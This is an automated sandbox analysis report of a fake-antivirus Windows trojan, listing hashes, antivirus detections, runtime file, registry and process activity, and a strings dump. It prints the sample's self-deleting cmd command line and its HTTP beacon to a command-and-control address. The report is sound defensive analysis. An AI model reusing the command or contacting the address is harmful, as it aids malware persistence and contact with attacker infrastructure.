Analysis Date2015-05-07 08:01:19
MD500492b6b07181e907ee1e69915553938
SHA14f80199671d77689dd493fc5a23dda711b84781b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 3819c44ed5b46fc1138bf79c67cdf621 sha1: 8a34a551c6f9c0536bece4164d7a421550a9f332 size: 177664
Section.rdata md5: 26fd84be46c5a152064258d40da25cd5 sha1: cfad28aba1d4e80ed2b03ae431c3ef06a427ed2f size: 1536
Section.data md5: d80c20c285ceb0d3ce05a9657026d717 sha1: dd5e41e182d05905af573a058dd30f0e6a533af7 size: 68608
Section.rsrc md5: 89f70ca28cc49222e0b2a278e4a4deef sha1: e0f7c5c3d879513101a3d4b587d9b887733d19d7 size: 12288
Timestamp2005-07-26 00:19:22
PEhashda984ba82a490241f169cac2809417acd69ba63a
IMPhash4757145cf643f820b62a7588ba412b5f
AVAd-AwareGen:Variant.Kazy.5193
AVAlwil (avast)MalOb-EY [Cryp]
AVArcabit (arcavir)Gen:Variant.Kazy.5193
AVAuthentiumW32/FakeAlert.JH.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBitDefenderGen:Variant.Kazy.5193
AVBullGuardGen:Variant.Kazy.5193
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)FraudTool.Security
AVClamAVno_virus
AVDr. WebTrojan.Fakealert.19447
AVEmsisoftGen:Variant.Kazy.5193
AVEset (nod32)Win32/Kryptik.CA
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/FakeAlert.JH.gen!Eldorado
AVF-SecureGen:Variant.Kazy.5193
AVGrisoft (avg)Cryptic.BSC
AVIkarusPacker.Win32.Krap
AVK7Trojan ( 001cdda01 )
AVKasperskyPacked.Win32.Krap.ic
AVMalwareBytesRogue.SecureShield
AVMcafeeFakeAlert-AVPSec.l
AVMicrosoft Security EssentialsRogue:Win32/Winwebsec
AVMicroWorld (escan)Gen:Variant.Kazy.5193
AVPadvishno_virus
AVRisingno_virus
AVSophosMal/FakeAV-DO
AVSymantecTrojan.Gen
AVTrend MicroTROJ_FAKEAV.BMC
AVTwisterTrojan.558BEC81EC3C01000.mg
AVVirusBlokAda (vba32)BScope.Trojan.FakeAV.1707

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe
Creates Process"C:\WINDOWS\system32\cmd.exe" /c taskkill /f /pid 1364 & ping -n 3 127.1 & del /f /q "C:\malware.exe" & start C:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe -f
Creates Mutexi'm here
Creates MutexDBWinMutex

Process
↳ "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /pid 1364 & ping -n 3 127.1 & del /f /q "C:\malware.exe" & start C:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe -f

Creates Processping -n 3 127.1
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe -f
Creates Processtaskkill /f /pid 1364

Process
↳ taskkill /f /pid 1364

Creates FilePIPE\lsarpc

Process
↳ ping -n 3 127.1

Winsock DNS127.1

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Application Data\12386.exe -f

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutexi'm here
Winsock DNS216.38.2.151

Network Details:

HTTP GEThttp://216.38.2.151/cb_soft.php?q=707ae34c06a99dc85bca26bb2bbef34e
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
HTTP GEThttp://216.38.2.151/cb_soft.php?q=707ae34c06a99dc85bca26bb2bbef34e
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 216.38.2.151:80
Flows TCP192.168.1.1:1031 ➝ 216.38.2.151:80
Flows TCP192.168.1.1:1032 ➝ 216.38.2.151:80

Raw Pcap
0x00000000 (00000)   47455420 2f63625f 736f6674 2e706870   GET /cb_soft.php
0x00000010 (00016)   3f713d37 30376165 33346330 36613939   ?q=707ae34c06a99
0x00000020 (00032)   64633835 62636132 36626232 62626566   dc85bca26bb2bbef
0x00000030 (00048)   33346520 48545450 2f312e31 0d0a5573   34e HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000060 (00096)   653b204d 53494520 352e353b 2057696e   e; MSIE 5.5; Win
0x00000070 (00112)   646f7773 204e5420 352e3029 0d0a486f   dows NT 5.0)..Ho
0x00000080 (00128)   73743a20 3231362e 33382e32 2e313531   st: 216.38.2.151
0x00000090 (00144)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000a0 (00160)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f63625f 736f6674 2e706870   GET /cb_soft.php
0x00000010 (00016)   3f713d37 30376165 33346330 36613939   ?q=707ae34c06a99
0x00000020 (00032)   64633835 62636132 36626232 62626566   dc85bca26bb2bbef
0x00000030 (00048)   33346520 48545450 2f312e31 0d0a5573   34e HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000060 (00096)   653b204d 53494520 352e353b 2057696e   e; MSIE 5.5; Win
0x00000070 (00112)   646f7773 204e5420 352e3029 0d0a486f   dows NT 5.0)..Ho
0x00000080 (00128)   73743a20 3231362e 33382e32 2e313531   st: 216.38.2.151
0x00000090 (00144)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000a0 (00160)   206e6f2d 63616368 650d0a0d 0a          no-cache....


Strings
o
 
5
.3>.
I
P
b.
.ks...
.
....
$`@\
aCE#
071H8Tp
0P}.$$
\ 0q'5
0-VUUW
^1jSpF
1|V)piMs
2N7N<r
3<7M!B
;;\3MpA
:^3WK;	S`
4hData
4hDire
4hryTo
4We6	-
[)[5:H
5*M7F]hL
_5Tz.~$
64$e['
6H-]iV
|6wU4Qh
78;}=8
>7< l	
7O8Q>i
82QuPD
8}A/)mV3s
8m\x1-
8NJO}.
||8V$l
8xTQR-
.9?|0X
9EVy.UF
_9iLik
9_~\	]j
9Yli[a
a"@##.
ANF~,X
b"9U9b
**?b B
Bf28D_
BqW*U B
bsJSFK
C0[/;R
.C5$)i
CertCloseStore
CertCompareIntegerBlob
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertFindCertificateInStore
CertGetCertificateContextProperty
CFGMGR32.dll
CloseHandle
CM_Get_Depth_Ex
CoCreateGuid
CoInitialize
CoUninitialize
CreateThread
CRYPT32.dll
CryptHashCertificate
CryptHashPublicKeyInfo
CryptSignAndEncodeCertificate
CvcvN0
@.data
DeleteCriticalSection
;D=	;<o
d|Zu.p	(8
'%%E9\pI~
\+E"lO
EnterCriticalSection
)eTu}g
,E)We0KPJ
F)9LYd
Fhky@"m
FU((KO
+F`[Y?:
g;8U?Tx-g
GetCommandLineA
GetCurrentDirectoryW
GetCurrentProcess
GetCurrentThreadId
GetLastError
GetModuleHandleA
GetModuleHandleW
GetVersionExA
Gi <Ig
+@Hk#-
hLibrh
hLoadhd&
HqOoJ]x
hSleeh
hVirth
]?Hx6N
hX)Z$l
hz:zQa
i2l0h7C
-]I:6D
;(i94Tp
InitializeCriticalSection
I*_StZ
&#|Iu:q
}!j''{|
j4_h@>
J4hLocah
?Jo8EP
Jr"c@j.
+JRxzC
!jsv^jte
kdpw4m
KERNEL32.dll
kIzP3-
;}Kqr7
LeaveCriticalSection
L.]^LY
ln.J `
LoadStringA
LoadStringW
[LqT|M
lstrcmpiA
lstrlenA
?{m0{5
M"4l78
Mj(HPTa
M/R,mZ
MultiByteToWideChar
n2",;-
;N[>]GO
{Ni8|W7
N^jB$^
n*J^|H
|NKU&,Y
+|n	pr
N./R<<
>N/TmU
Nuy>Y]
{O0+M+-
o1\%@G
O6z>6/
ole32.dll
or%>3.j
O+rUt85{
OTx<3)
oyok/7I
(O{ZsV
?P1zWw
p>3N99Q
{PbulS
PI]* @
PPh20*
PQKN8f
PRX5mWR
?PyQ*k
q]8z$$
Q,Ed&|H
& qJzO
^q[PkA
Q.~)s[
Q"xEKOD
Q?YR**M
`.rdata
ResetEvent
)Rh(-Qi
\:Rich?
)rM3_)
rmx%'B
r^]no;
r~Uri<0"
r+x`>5
ry25lW
S4Qw'h
s?[b<C
SetCurrentDirectoryA
SetErrorMode
SetEvent
SetPriorityClass
SetThreadPriority
SHGetThreadRef
SHLWAPI.dll
SI0	jP+
^sLVr-
SoEMC@
sP5o#[
SSndLi
@su8Gp
SVM]pf
sWxTv*
T5wm?E
;T:	;D
TerminateProcess
TerminateThread
!This program cannot be run in DOS mode.
T,J4j@
T.wz,'
TZmx}F
;u0bnF
u0<C?[
U.J'Eg
>}uL<z
	;UQoG
USER32.dll
"UUUVg
UUYL+8
Uxo;zU
V14xcB
v^7_}8`+
|VON*y
VUQue}
WaitForSingleObject
$wA/R/<
wc'vlj
WideCharToMultiByte
\WW(1rB
WwNPx+PvjYV3
X-0rWI!c
Xv:	_A
-Xw^tz
??Y=^0|
~y]jNA
y_.Kw1-
yNCRYi^
zW/&Q)+5
-zYr~$